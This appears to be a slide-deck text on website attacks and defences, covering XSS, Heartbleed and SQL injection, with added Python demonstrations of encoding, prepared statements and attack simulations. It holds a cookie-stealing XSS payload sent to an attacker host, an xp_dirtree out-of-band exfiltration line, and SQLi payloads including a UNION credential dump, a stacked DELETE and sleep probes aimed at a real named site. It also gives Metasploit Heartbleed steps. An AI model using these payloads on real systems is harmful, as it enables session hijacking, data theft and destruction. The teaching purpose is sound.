Website Hacking and Prevention (All Tools, Topics & Techniques)
- 4. Types of Websites
Static Websites
• Quick to develop
• Easy to host
• Smaller attack surface: no server-side code or database to exploit
• Harder to hack
• Requires web development expertise to update the site
• Less useful to the user
• Content can go stale
Dynamic Websites
• Slower and more expensive to develop
• Hosting costs a little more
• Larger attack surface: server-side code and a database that accept user input
• More prone to hacking
• Much more functionality
• Easy to update
• New content brings people back to the site and helps with search engine ranking
• Can work as a system that lets staff or users collaborate
- 8. Website Technologies
• Markup Languages
HTML
CSS
XML
• Programming and Scripting Languages
JavaScript
VBScript
PHP
C#
Perl
ASP.NET
• Web Servers
Internet Information Services (IIS)
Apache
• Databases
SQL Server
MySQL
- 15. URL HIJACKING (typosquatting)
• The attacker makes money from the user's typing mistake
• They register misspelled variants of well-known domains
• The misspelled domain captures traffic meant for the famous URL and redirects it
• It may host a fake website or phishing site
• Or it may infect the visitor with a drive-by download
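The defensive side of this slide is knowing which misspellings of your own domain an attacker would register. The following generator is an added example written for this page (it is not from the deck or any tool it names); the keyboard-neighbour table is a deliberately small assumption covering only a few US-QWERTY keys, and the domain used in the usage line is constructed:

```python
"""Generate the typosquat candidates of a brand domain (added example)."""
from typing import Set

# Assumption: a handful of neighbouring keys on a US QWERTY layout, enough for
# the demo; a production list would cover the whole keyboard and several layouts.
QWERTY_NEIGHBOURS = {
    "a": "qwsz", "e": "wsdr", "i": "ujko", "o": "iklp", "l": "kop",
    "m": "njk", "n": "bhjm", "p": "ol", "s": "awedxz", "t": "rfgy",
}


def typosquat_candidates(domain: str) -> Set[str]:
    """Return plausible misspellings of `domain` (the TLD is kept as-is).

    Covers the classic typosquat families: a dropped letter, a doubled letter,
    two adjacent letters swapped, a neighbouring key hit instead of the right
    one, and the 'rn' <-> 'm' confusion that survives in plain ASCII.
    """
    label, _, tld = domain.lower().partition(".")
    found = set()
    for i in range(len(label)):
        found.add(label[:i] + label[i + 1:])                    # omission
        found.add(label[:i] + label[i] * 2 + label[i + 1:])     # duplication
        if i + 1 < len(label):                                  # transposition
            found.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
        for key in QWERTY_NEIGHBOURS.get(label[i], ""):         # adjacent key
            found.add(label[:i] + key + label[i + 1:])
    found.add(label.replace("m", "rn"))
    found.add(label.replace("rn", "m"))
    found.discard(label)
    return {f"{c}.{tld}" for c in found if c}


def is_typosquat_of(candidate: str, trusted: str) -> bool:
    """True when `candidate` is one typo away from `trusted` by the rules above."""
    return candidate.lower() in typosquat_candidates(trusted)


if __name__ == "__main__":
    # Constructed input: a brand domain to monitor.
    for name in sorted(typosquat_candidates("example.com")):
        print(name)
```

Feeding the output to a WHOIS or passive-DNS check tells you which variants are already registered by someone else; the same function applied to links in incoming mail flags the "badly spelled domain" the slide describes.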
- 18. STROKEJACKING
It is extremely similar to clickjacking, in that a malicious site has a user doing things they don't want to do. Except, this time, it's with the keyboard instead of the mouse, hence the "stroke". The attacking site gets the user to type (or cut and paste) the information the attacker is looking for. This could lead to another attack (if the user is made to type JavaScript), or simply to the capture of a username and password. The user thinks they are logging into a site, but they are really sending characters over to the attacker's site.
TAPJACKING
• A hacking technique where a malicious application presents a fake user interface in order to capture user events for a hidden action in the background.
• Like clickjacking on the web, tapjacking occurs when a malicious application displays a fake user interface that seems interactive, but actually passes interaction events such as finger taps through to a hidden user interface behind it.
• Tapjacking is mostly used against mobile applications and mobile websites.
- 21. Tools and Techniques Required to Perform Attacks
WHOIS
robots.txt files
HTTrack (clone a website)
BeEF (Browser Exploitation Framework)
Electronic Data Gathering, Analysis and Retrieval (EDGAR)
Shodan search
Google hacking
DNS lookup
nslookup
dig (Domain Information Groper)
Netcraft
httprint
Fierce
Encoders and decoders
- 26. Definition
Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications.
XSS enables attackers to inject client-side scripts into web pages
viewed by other users.
A cross-site scripting vulnerability may be used by attackers to
bypass access controls such as the same-origin policy.
- 27. XSS Types
Persistent (Stored)
Stored or Persistent XSS is a kind of XSS vulnerability where untrusted
user input is processed and stored by the server in a file or database
without any validation, and is later fetched from storage and sent back in
responses without encoding or escaping. The injected script runs in the
browser of every user who views the affected page, for as long as the
stored data remains.
- typical entry points: forum posts, bulletin boards, feedback forms
- 28. XSS Types
Non-Persistent (Reflected)
Reflected or Non-Persistent XSS is a kind of XSS vulnerability where
untrusted user input (usually part of the request, such as a URL
parameter) is immediately processed by the server without any validation
and reflected back in the same response without encoding or escaping,
resulting in code execution in the browser of the user who sent that request.
- typical delivery: a crafted link placed on another website or sent by email
- 29. XSS Types
Local (DOM based)
DOM Based XSS is a form of client-side XSS in which the source of the
data is in the DOM (for example location.hash or document.referrer), the
sink is also in the DOM (for example innerHTML or eval), and the data
flow never leaves the browser, so the server may never see the payload.
It occurs when untrusted data read from a source is executed because it
modifies the DOM "environment" in the browser, i.e. it is written to a
sink without being escaped or encoded for that sink's context.
- also seen in browser plugins such as Adobe Reader (PDF) and Flash Player
- 32. 2) The attacker creates an attack URL for stealing sensitive
information and disguises it so that it appears legitimate.
Here it is:
<script>document.location = "http://localhost/attacker.com/redirect.php?a=" + document.cookie</script>
3) The attacker distributes the malicious XSS link via social engineering to
unsuspecting users.
- 33. Screenshot
4) When the victim logs in, the JavaScript embedded in the malicious
XSS link executes and transmits the victim's session cookie to the
attacker.
- 35. XSS Risks
XSS can
1) Steal cookies
- hijack the user's session, unauthorized access
2) Spy on what you do
3) Modify the content of the web page
- inserting images or words, misinforming, spreading bad reputation
4) Network mapping (the victim's browser is used to probe the internal network)
5) XSS worms/viruses (self-propagating stored payloads)
- 36. XSS Countermeasures
1) Content Filtering:
"The application may attempt to detect and remove all scripts from un-
trusted HTML before sending it to the browser." Content filtering is
otherwise known as sanitization. This defense technique uses filter
functions to remove potentially malicious data or instructions from user
input. Filter functions are applied after user input is read by a web
application, but before the input is used in an operation or output to the
web browser. Removal of scripts from untrusted content is a difficult
problem for web applications that permit HTML markup in user input, such
as blogs. To be completely effective in eliminating XSS, a filter function must
necessarily model the full range of parsing behaviors pertaining to script
execution for several browsers.
- 37. XSS Countermeasures
Challenges of Content Filtering:
Allowing all benign HTML user input while simultaneously blocking
all potentially harmful scripts in the untrusted output. Every control
character that can be used to introduce attack code also has a
legitimate use in some benign, non-script context. For example, the '<'
character needs to be present in hyperlinks and text formatting, and the
'"' character needs to be present in generic text content. Both are
legitimate and allowed user inputs, but can be abused to mount XSS
attacks. Browser behavior varies from browser to browser; it is
complex to model, not entirely understood and not fully known (especially
for closed-source browsers like Microsoft Internet Explorer). Therefore,
from a web application perspective, the task of implementing correct
and complete content filter functions is very difficult, if not impossible.
The practical consequence is that output encoding for the specific context
(HTML text, attribute, JavaScript, URL) is preferred over trying to
recognise and strip attacks.
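To make the filtering problem concrete, here is an added example (written for this page, not code from the deck): a naive "remove the script tags" filter beside context-aware output encoding, run over three constructed payloads, the first of which is the cookie-stealing style shown in the attack walkthrough above. The attacker host name attacker.example is made up, and looks_active() is only a crude test oracle, not a real XSS detector.

```python
"""Naive script stripping vs. output encoding (added example)."""
import html
import re

# Constructed attacker inputs. [0] is the cookie-stealing payload style from the
# deck; [1] needs no <script> at all; [2] is built to survive token removal.
PAYLOADS = [
    '<script>document.location="http://attacker.example/?a="+document.cookie</script>',
    '<img src=x onerror="fetch(\'http://attacker.example/?a=\'+document.cookie)">',
    '<scr<script>ipt>alert(1)</scr</script>ipt>',
]

SCRIPT_TOKEN = re.compile(r"</?script>", re.IGNORECASE)


def naive_filter(user_input: str) -> str:
    """The 'content filtering' idea in its simplest form: delete <script> tokens.
    Deleting a token once lets a nested token reassemble into a live tag."""
    return SCRIPT_TOKEN.sub("", user_input)


def encode_for_html(user_input: str) -> str:
    """HTML text/attribute context: turn every metacharacter into an entity so the
    browser can never start a tag or leave a quoted attribute from user data."""
    return html.escape(user_input, quote=True)


def render_text(user_input: str) -> str:
    """Untrusted data placed in HTML element content."""
    return "<p>Hello, " + encode_for_html(user_input) + "</p>"


def render_attribute(user_input: str) -> str:
    """Untrusted data placed in a quoted attribute value."""
    return '<input type="text" value="' + encode_for_html(user_input) + '">'


def looks_active(fragment: str) -> bool:
    """Test oracle: a '<' followed by a letter (or '/') can open or close a tag,
    which is the precondition for any script or event handler to run."""
    return re.search(r"<\s*/?[a-z]", fragment, re.IGNORECASE) is not None


if __name__ == "__main__":
    for p in PAYLOADS:
        print("filtered :", naive_filter(p), "| active:", looks_active(naive_filter(p)))
        print("encoded  :", render_text(p), "| active:", looks_active(encode_for_html(p)))
```

The filter stops only the first payload; the second never contained the word it looks for, and the third reassembles into `<script>alert(1)</script>` after one pass. Encoding neutralises all three without needing to know what an attack looks like, which is the argument the slide makes against modelling browser parsing behaviour.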
- 38. XSS Countermeasures
2) Browser Collaboration:
“The application may collaborate with the browser by indicating which
scripts in the web page are authorized, leaving the browser to
ensure the authorization policy is upheld.” Robust prevention of XSS
attacks can be achieved if web browsers are made capable of
distinguishing authorized from unauthorized scripts.
This approach can be implemented by
(a) creating a server–browser collaboration protocol to communicate
the set of authorized scripts, then
(b) modifying the browser to understand this protocol and enforce a
policy denying unauthorized script execution.
- 39. XSS Countermeasures
Challenges of Browser Collaboration:
Although this defense strategy is a compelling and effective long-term
solution, its implementation takes a long time, because web
applications adopting this approach require their users to run browsers
that understand the protocol. There must first be agreement on a
standard for server-browser collaboration, and then that standard must
be implemented in mainstream browsers. This is a long, complicated
process that can take several years.
Ex: Browser-Enforced Embedded Policies (BEEP), a research prototype.
Content Security Policy (CSP), delivered in the Content-Security-Policy
response header and now implemented by all major browsers, is the
standardized form of this idea: the server declares which script sources
(or per-response nonces and hashes) are authorized, and the browser
refuses to execute anything else, including inline scripts injected by XSS.
- 42. OpenSSL is a software library used in applications that need to secure
communications over computer networks against eavesdropping, or need to
ascertain the identity of the party at the other end.
It has found wide use in internet web servers, serving a majority of all web sites.
OpenSSL contains an open-source implementation of the SSL and TLS
protocols.
- 44. The Secure Sockets Layer (SSL) and its successor Transport
Layer Security (TLS) are the most widely deployed security protocols
in use today. Essentially, they provide a secure (encrypted and
authenticated) channel between two machines operating over the
Internet or an internal network.
- 45. What happened?
The Heartbleed vulnerability was announced to the world on
7 April 2014 as an OpenSSL vulnerability, together with a fixed
release (1.0.1g).
It was found independently by Google's security team and by
Codenomicon.
The private keys of SSL certificates could be exposed.
Many big-name companies were vulnerable: big tech names,
banks, law enforcement, intelligence agencies.
But...
- 46. What is the heartbeat extension?
Heartbeat is an echo function in which either side
(client or server) asks that a number of bytes of data
it sends be echoed back by the other side.
The intent is a keep-alive feature: the echo lets each end
verify that the other still handles encryption and decryption
correctly. The request carries its own payload-length field, and
the bug was that OpenSSL trusted that field instead of the length
of the record it had actually received.
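The length bug is easiest to see in a few lines. The following is an added simulation written for this page, not OpenSSL's code: the record layout follows RFC 6520 (type, 2-byte payload length, payload, padding), the "heap" is a constructed byte string in which the received record happens to be followed by a stand-in for a private key, and the two functions model the behaviour before and after the 1.0.1g fix.

```python
"""Simulation of the OpenSSL heartbeat length bug (added example)."""
import struct
from typing import Optional

PADDING = 16  # minimum padding required by RFC 6520


def build_heartbeat(payload: bytes, claimed_length: int) -> bytes:
    """Encode a heartbeat request: type(1) | payload_length(2) | payload | padding.
    An honest peer passes claimed_length == len(payload)."""
    return struct.pack("!BH", 1, claimed_length) + payload + b"\x00" * PADDING


def vulnerable_respond(heap: bytes) -> bytes:
    """Pre-1.0.1g behaviour. The received record starts at heap[0]; the code
    reads payload_length from the peer and copies that many bytes starting just
    after the 3-byte header, regardless of how long the record really was."""
    _hbtype, payload_length = struct.unpack("!BH", heap[:3])
    return heap[3:3 + payload_length]


def fixed_respond(record: bytes) -> Optional[bytes]:
    """1.0.1g behaviour: discard the record if the claimed payload plus header
    and minimum padding does not fit inside what was actually received."""
    _hbtype, payload_length = struct.unpack("!BH", record[:3])
    if 1 + 2 + payload_length + PADDING > len(record):
        return None
    return record[3:3 + payload_length]


# Constructed stand-in for whatever else is on the heap (NOT a real key).
SECRET = b"-----BEGIN RSA PRIVATE KEY-----constructed-demo-bytes-----"


def demo(claimed_length: int):
    """Send a 5-byte payload with the given claimed length; return
    (what the vulnerable server echoes, what the fixed server echoes)."""
    record = build_heartbeat(b"hello", claimed_length)
    heap = record + SECRET + b"\x00" * 1024
    return vulnerable_respond(heap), fixed_respond(record)


if __name__ == "__main__":
    leaked, safe = demo(65535)
    print("vulnerable echoed", len(leaked), "bytes; contains key material:",
          b"PRIVATE KEY" in leaked)
    print("fixed server reply:", safe)
```

With an honest length both versions echo exactly `hello`; with the maximum claimed length of 65,535 the vulnerable version returns everything that follows the record in memory, which is why each probe in the Metasploit walkthrough further down leaks "about 64k" of server memory.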
- 48. Background
The Heartbleed vulnerability is possibly the worst thing that ever happened
to online trust. Ironically, a vulnerable HTTPS server is in one respect worse
off than plain HTTP: attackers can read sensitive data out of the server's
memory without having to intercept any traffic at all.
Initial reactions focused on:
• patching vulnerable web servers,
• revoking and reissuing SSL certificates,
• changing user passwords.
It took a couple more days to realize that Heartbleed also affects client
software, non-web SSL traffic and countless embedded devices that
will never receive a software update.
- 50. It can be performed with the Metasploit exploit framework.
We'll see how it's performed step by step.
Step 1: Update Metasploit using msfupdate
Step 2: Start Metasploit
kali > msfconsole
- 52. Step 3: Find Heartbleed
msf > search heartbleed
This brings up two modules:
auxiliary/scanner/ssl/openssl_heartbleed
and
auxiliary/server/openssl_heartbeat_client_memory
We'll use the first one (the second is a malicious server that attacks vulnerable clients).
- 54. Step 4: Use the auxiliary module
msf > use auxiliary/scanner/ssl/openssl_heartbleed
This loads the Heartbleed scanner module.
- 55. info
Type
msf > info
This reveals the options that need to be set in order to use this module,
and a description of the module.
- 57. Step 5: Set options
Although this module has numerous options, the critical one is RHOSTS.
Let's set it to a target on the lab network that is still vulnerable to
Heartbleed:
msf > set RHOSTS 192.168.1.169
- 59. Step 6: Run the module
Finally, set the option VERBOSE to true so that the module prints the
leaked memory:
msf > set VERBOSE true
And let's run it:
msf > run
As the next screenshot shows, the server leaked about 64 KB of whatever
was in its memory (a heartbeat response carries at most 65,535 bytes of
payload, so each request can leak up to that much).
- 61. Let Us Define….
• Alice, Bob: users of online services.
• Eve: a passive attacker (eavesdropper).
• Trudy: an active attacker who may exploit the
Heartbleed bug by sending specially crafted heartbeat
packets over an SSL (e.g. HTTPS) connection.
• yuri.com: a web site with vulnerable SSL software.
Since OpenSSL is so widely used, any web site should be
considered a potential yuri.com until proven otherwise.
- 63. 1. Extraction of sensitive data from vulnerable HTTPS
servers
In this scenario Alice enters or consults sensitive data on
yuri.com over HTTPS. The plaintext lingers in the memory
of the web server. Later, Trudy connects as a regular
HTTPS client and exploits Heartbleed.
Countermeasures for end users
• Do not exchange sensitive information with a web site
until it tells you it has dealt with Heartbleed.
Field reports
• Canadian charged in 'Heartbleed' attack on tax agency.
- 64. 2. Session hijacking from vulnerable HTTPS servers
In this scenario Trudy extracts session cookies rather than
login credentials. This allows her to take control of Alice's
account without waiting for her to enter her credentials.
Countermeasures for end users
• Log out of online services until they have dealt with
Heartbleed.
- 65. 3. Extraction of SSL private keys from vulnerable
HTTPS servers
In this scenario Trudy extracts the SSL/TLS private key of
yuri.com. Regardless of what happens next, leakage of
private keys is always a major failure.
Lessons learned
• Protect private keys with a hardware security module.
Field reports
• Confirmed: Heartbleed Exposes Web Server's Private
SSL Keys
- 67. 4. Man-in-the-middle impersonation of online
services
In this scenario mallory.com impersonates yuri.com after
extracting its SSL private key. This man-in-the-middle
attack (MITM) is more dangerous than passive snooping
because mallory.com can present yuri.com's genuine
certificate, whose key is now compromised, and Alice has
no reason to distrust it. Sitting inside the authenticated
session also allows mallory.com to defeat some multi-factor
security measures.
Countermeasures for end users
• Check whether your browser detects revoked
certificates.
• If it does not, inspect certificates manually.
Lessons learned
• Heartbleed will probably be the end of the current
certificate revocation infrastructure.
- 66. 5. Tor traffic correlation
Eve, an evil dictator, wants to establish that Alice is using
Tor to communicate with george.com, a foreign human-
rights organization. Eve can spy on all Internet traffic
within her national boundaries but has no wiretapping
authority in other countries. She exploits Heartbleed
massively against vulnerable Tor exit nodes in order to
match outgoing traffic with her local intercepts.
- 68. 6. De-anonymization of hidden servers and users by
malicious Tor nodes
Trudy sets up a number of malicious Tor guard nodes. She
exploits the Heartbleed vulnerability against clients that
connect to them, including Tor hidden servers and their
users. Although Tor hidden services are encrypted end-to-
end, Trudy can identify vulnerable users and servers
from the plaintext data leaked by Heartbleed at each end.
Besides, if she extracts the private key of a hidden
service, she can impersonate it.
Field reports
• "Tor hidden services might leak their long-term hidden
service identity keys to their guard relays."
- 69. 7. Attacks against VPN servers
Alice is aware that most public WiFi networks provide no
privacy. Therefore she has configured her smartphone
and laptop to connect to the Internet through a VPN
service provider, yuri.com. (Alternatively, she could be
running her own VPN server at home, or using the VPN
feature that comes bundled with her DSL modem or her
NAS box.) Eve snoops on the WiFi network that Alice is
currently using, notices SSL-based VPN traffic from her
smartphone, exploits Heartbleed against the destination
IP address, and retrieves either VPN keys or plaintext
traffic.
Field reports
• Attackers exploit the Heartbleed OpenSSL vulnerability
to circumvent multi-factor authentication on VPNs.
• OpenVPN uses OpenSSL as its crypto library by default
and was therefore affected.
- 71. DANGER:
OpenSSL, an open-source project staffed at the time by about ten
individuals and run on a limited budget, is used to secure
millions of servers, ensuring the integrity of email, e-
commerce, online banking and other properties, in many
cases for multi-billion dollar companies.
Heartbleed obviously has wide-reaching implications, not
only for the integrity of the Web but also for mobile apps.
But how much damage did it actually do prior to its
discovery and patching?
- 73. The issue also spread to mobile devices. Android
apps, for instance, may connect to servers affected by
Heartbleed, and may themselves link a vulnerable OpenSSL.
While they are not dedicated browsers such as Google Chrome
or Apple Safari, some of these apps embed their own browser
views, blurring the line between mobile software and the Web.
That risk is worth noting, not just for the OpenSSL bug but for
future thinking about overall Internet security.
- 75. These weaknesses are all addressable, and the
speed with which companies and security experts
have acted has been encouraging. Still, the
community will have to stay on its toes to protect the
emerging Internet of Everything from OpenSSL and
future bugs.
- 77. What is SQL?
SQL (Structured Query Language) is the language used to manage
relational databases.
Management systems that use SQL include Microsoft SQL Server,
Oracle, MySQL, PostgreSQL and others.
- 78. What is SQL Injection?
SQL injection (SQLi) is an injection attack in which the attacker gets
the application to execute SQL statements of the attacker's choosing
against the web application's database server.
The attacker can use SQL injection to:
Add, delete, edit or read content from the database
Read source code from files on the database server
Write files to the database server
- 79. Classification of SQL injections
There are 3 major classifications:
1. In-band SQLi (Classic SQLi)
2. Inferential SQLi (Blind SQLi)
3. Out-of-band SQLi
- 80. In-Band SQLi or Classic Attacks
Most attacks rely on basic SQL manipulation and are considered
classic attacks. They include:
WHERE clause modification
UNION operator injection
query stacking
- 81. WHERE Clause Manipulation: user input generally ends up in
the WHERE clause of a database query.
Example:
In a login page where a username is entered, the SQL query is built like this:
"SELECT * FROM users WHERE name = '" + userName + "';"
If the userName variable is crafted in a specific way, the SQL
statement may do more than the code author intended. Setting
userName to:
' OR '1'='1
or, using a comment to discard the rest of the query:
' OR '1'='1' --
renders the SQL query as:
SELECT * FROM users WHERE name = '' OR '1'='1';
SELECT * FROM users WHERE name = '' OR '1'='1' -- ';
Because '1'='1' is always true, the WHERE clause now matches every
row of users. (In MySQL the -- comment marker must be followed by a space.)
- 83. SQL injection using UNION: the UNION operator lets the
attacker append a SELECT of their own and read its results through
the application's normal output.
Example:
USER INPUT:
' AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members
WHERE 'a'='a
GENERATED QUERY:
SELECT id, name, description FROM products WHERE category = ''
AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members
WHERE 'a'='a'
The 'a'='b' condition empties the original result set, so only the
attacker's rows come back. As written, the injected SELECT returns the
constants 999, 'abc', 'xyz' once per row of members; this is how the
attacker confirms that the number and types of columns match. Replacing
the constants with column names such as id, username, password then
returns the usernames and passwords of all members in the database.
- 84. Query stacking: stacked queries give the attacker a lot of control.
By terminating the original query and adding a new one, it becomes
possible to modify data and call stored procedures. Whether this works
depends on the database and driver: SQL Server allows it, while many
MySQL and SQLite client APIs refuse to run more than one statement per call.
Example
A classic attack using this technique could look like the following.
MALICIOUS USER INPUT:
1; DELETE FROM products
GENERATED QUERY WITH MULTIPLE STATEMENTS:
SELECT * FROM products WHERE productid=1;
DELETE FROM products
- 85. Inferential SQLi attack
The main intent of the attacker in an inferential SQLi is to identify the
injectable parameters and extract the database schema and data.
Here no data is actually transferred via the web application, and the
attacker cannot see the result of the attack in-band. It is
also referred to as blind injection.
There are two well-known attack techniques that are based on
inference:
Boolean-based blind injection
Time-based blind injection
- 86. Boolean-based blind injection: information is inferred from the behaviour
of the page by asking the server true/false questions. If the injected statement
evaluates to true, the site continues to function normally. If the statement
evaluates to false, although there is no descriptive error message, the page
differs noticeably from the normally functioning page.
Example:
In this website it shows some information which is stored in some database
http://www.psn.com.pk/index.php?page=gallery.php&id=519
The attacker finds the vulnerability using Boolean based blind injection
False query:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=2
True query:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=1
- 89. Time-based blind injection: for time-based attacks, the attacker
instructs the database to perform a time-intensive operation. If the
web site's response is delayed accordingly, the web application is
vulnerable to blind SQL injection. A popular time-intensive operation
is the sleep function (MySQL syntax shown below).
Example:
In the website
http://www.psn.com.pk/index.php?page=gallery.php&id=519
To perform a time-based blind attack the query becomes:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and if(1=1,
sleep(10), false)
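What a single true/false bit buys the attacker is easier to see when the loop is written out. This added example (written for this page, not from the deck) uses an in-memory SQLite table of constructed data as the stand-in for the vulnerable site: page_oracle() plays the role of "the page looks normal or not", and extract_blind() recovers a value one character at a time by binary search over the code point. The time-based variant in the slide works the same way, with the oracle measuring elapsed time instead of page content.

```python
"""Boolean-based blind extraction against a local oracle (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the target's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE members(id INTEGER, username TEXT, password TEXT);
        INSERT INTO members VALUES (1, 'admin', 'S3cret!');
    """)
    return db


def page_oracle(db: sqlite3.Connection, injected: str) -> bool:
    """Stand-in for the web page: the application builds its query by string
    concatenation, and the page 'looks normal' only when a row comes back."""
    sql = "SELECT id FROM members WHERE id = 1 " + injected
    return db.execute(sql).fetchone() is not None


def extract_blind(db: sqlite3.Connection, expression: str, max_len: int = 32) -> str:
    """Recover the string value of a SQL expression using only yes/no answers.

    For each position, binary-search the character's code point with
    'unicode(substr(expr, pos, 1)) > mid' questions: 7 requests per character.
    Past the end of the string substr() yields '' and unicode('') is NULL, so
    every question answers false and the search converges to 0, ending the loop.
    """
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if page_oracle(db, f"AND unicode(substr(({expression}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    conn = make_db()
    print(extract_blind(conn, "SELECT password FROM members WHERE username='admin'"))
```

The same query count (about seven requests per character) applies against a real site, which is why automated tools can dump whole tables through a page that never displays a single database value.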
- 91. Out-of-band SQLi
An out-of-band attack is used when the attacker cannot use the same
channel both to inject the payload and to collect the result.
Out-of-band techniques offer an attacker an alternative to inferential
time-based techniques, especially when the server's response times are
not very stable.
Consider the following URL crafted by an attacker:
https://example.com/products.aspx?id=1;EXEC master..xp_dirtree 'test.attacker.com' --
This will produce the following SQL query:
SELECT * FROM products WHERE id=1;EXEC master..xp_dirtree 'test.attacker.com' --
- 92. What happened is that there are now two separate queries that
SQL Server will execute:
/* First Query */
SELECT * FROM products WHERE id=1
/* Second Query */
EXEC master..xp_dirtree 'test.attacker.com' --
The second query invokes the extended stored procedure xp_dirtree,
which lists the sub-folders of the path given as its argument. When that
argument is a UNC path on the attacker's host (of the form
\\test.attacker.com\share), SQL Server must first resolve the host name,
and the DNS query that reaches the attacker's name server is the
out-of-band channel: data is exfiltrated by embedding it in the host name.
- 95. SQL Injection (SQLi)
SQL injection (SQLi) refers to an injection attack wherein an attacker
can execute malicious SQL statements (also commonly referred to as a
malicious payload) that control a web application's database server
(also commonly referred to as a relational database management
system, RDBMS).
- 96. How SQL Injection works
With the input password' OR 1=1 in the password field, the query becomes:
SELECT id FROM users WHERE username='username' AND password='password' OR 1=1'
(the trailing quote still has to be dealt with, typically with a comment
sequence such as -- or #, as shown in the WHERE clause examples above)
# Define POST variables
uname = request.POST['username']
passwd = request.POST['password']
# SQL query vulnerable to SQLi: the user's text is spliced into the statement
sql = "SELECT id FROM users WHERE username='" + uname + "' AND password='" + passwd + "'"
# Execute the SQL statement
database.execute(sql)
- 97. What's the worst an attacker can do with
SQL?
bypass authentication or even impersonate specific users
completely disclose the data residing on a database server
alter data, which affects data integrity and could cause repudiation issues, for instance
voiding transactions, altering balances and other records
delete records from a database
execute arbitrary operating system commands on the database server, where the
DBMS offers such a feature (e.g. xp_cmdshell on SQL Server)
- 98. What is a SQL Injection Vulnerability?
Non-Technical Explanation
A form that reads: Drive through <route> and <where should the bus stop?> if <when should the
bus stop?>.
Filled in as intended: Drive through route 66 and stop at bus stops if there are people at the bus
stops.
Filled in by an attacker: Drive through route 66 and do not stop at bus stops and ignore the rest of this
form. if there are people at the bus stop.
The driver cannot tell which words were the form and which were the passenger's input.
- 99. What is a SQL Injection
Vulnerability?
Technical Explanation
$statement = "SELECT * FROM users WHERE username = 'bob' AND password = 'mysecretpw'";
$statement = "SELECT * FROM users WHERE username = '$user' AND password = '$password'";
The first statement is what the developer expects; in the second, $user and
$password come straight from the request, so whatever the user types becomes
part of the SQL text.
- 100. Different Types of the SQL Injection
Vulnerability
Error based SQL Injection
Boolean Based SQL Injection
Time based SQL Injection
Out-of-Band SQL Injection Vulnerability
- 101. Impacts of the SQL Injection
Vulnerability
Add, delete, edit or read content from the database
Read source code from files on the database server
Write files to the database server
- 102. Preventing SQL Injection Vulnerabilities
Server-side scripting languages cannot tell whether the SQL query
string they have built is malformed; all they can do is send a string
to the database server and wait for the response.
When developing web applications you should use prepared
statements (parameterised queries) to prevent SQL injection. With
prepared statements the query structure and the data are sent to the
database separately, so the server interprets the data only as values
and an attacker cannot change the structure of the SQL query.
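The two halves of this deck, the WHERE clause and UNION attacks in the in-band section and the prepared-statement advice here, fit in one runnable comparison. This is an added example written for this page, not the deck's code: it builds a small SQLite database of constructed users and products, then runs the deck's own payloads through a string-concatenated query and through its parameterised equivalent.

```python
"""String-built queries beside parameterised ones, same payloads (added example)."""
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample data mirroring the deck's users/products/members tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, password TEXT);
        INSERT INTO users(name, password) VALUES ('alice', 'hunter2'), ('bob', 'p4ss');
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, description TEXT, category TEXT);
        INSERT INTO products(name, description, category) VALUES ('Widget', 'A widget', 'tools');
    """)
    return db


def login_vulnerable(db: sqlite3.Connection, user_name: str) -> List[str]:
    """The deck's login query, built by concatenation: user text becomes SQL."""
    sql = "SELECT name FROM users WHERE name = '" + user_name + "'"
    return [row[0] for row in db.execute(sql)]


def login_prepared(db: sqlite3.Connection, user_name: str) -> List[str]:
    """Same query with a bound parameter: the value can never close the quote."""
    return [row[0] for row in db.execute("SELECT name FROM users WHERE name = ?", (user_name,))]


def products_vulnerable(db: sqlite3.Connection, category: str) -> List[Tuple]:
    """The deck's product search, vulnerable to UNION injection."""
    sql = "SELECT id, name, description FROM products WHERE category = '" + category + "'"
    return list(db.execute(sql))


def products_prepared(db: sqlite3.Connection, category: str) -> List[Tuple]:
    return list(db.execute(
        "SELECT id, name, description FROM products WHERE category = ?", (category,)))


if __name__ == "__main__":
    conn = make_db()
    tautology = "' OR '1'='1"
    print("vulnerable login :", login_vulnerable(conn, tautology))   # every user
    print("prepared login   :", login_prepared(conn, tautology))     # nobody
    union = "' AND 'a'='b' UNION SELECT id, name, password FROM users WHERE 'a'='a"
    print("vulnerable search:", products_vulnerable(conn, union))    # credentials
    print("prepared search  :", products_prepared(conn, union))      # empty
```

Note that SQLite's Python driver refuses stacked statements in execute(), so the deck's `1; DELETE FROM products` payload fails here with a ProgrammingError rather than deleting anything; that is a property of the driver, not a defence you can rely on elsewhere.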
- 103. What Can Be Done to Prevent SQL
Injection Attacks?
sanitization
validation
- 104. Sanitization
Sanitization usually involves running any submitted data through an
escaping function (such as PHP's mysql_real_escape_string()) to ensure
that dangerous characters (like ' ) are escaped before they reach a SQL
query as data. Two caveats: the mysql_ extension was removed in PHP 7
(its replacements are mysqli_real_escape_string() and PDO::quote()),
and escaping only protects values inside quoted string literals, so it is a
fallback, not a substitute for prepared statements.
- 105. Validation
Validation attempts to ensure that the data submitted is in the form that is
expected. At the most basic level this includes ensuring that e-mail
addresses contain an "@" sign, that only digits are supplied when
integer data is expected, and that the length of a piece of data
submitted is not longer than the maximum expected length.
Two ways:
by blacklisting dangerous or unwanted characters (although
attackers can often get around blacklists)
by whitelisting only those characters that are allowed in a given
circumstance, which can involve more work on the part of the
programmer but is the more reliable approach
- 106. Other ways of prevention
Trust no one
Don't use dynamic SQL when it can be avoided
Firewall (including a web application firewall)
Update and patch
Reduce your attack surface
Use appropriate privileges (the application's database account should not own the schema)
Keep your secrets secret
Don't divulge more information than you need to (no raw database errors to users)
- 108. What is Phishing?
Phreaking + Fishing = Phishing
{Phreaking = making phone calls for free back in the '70s}
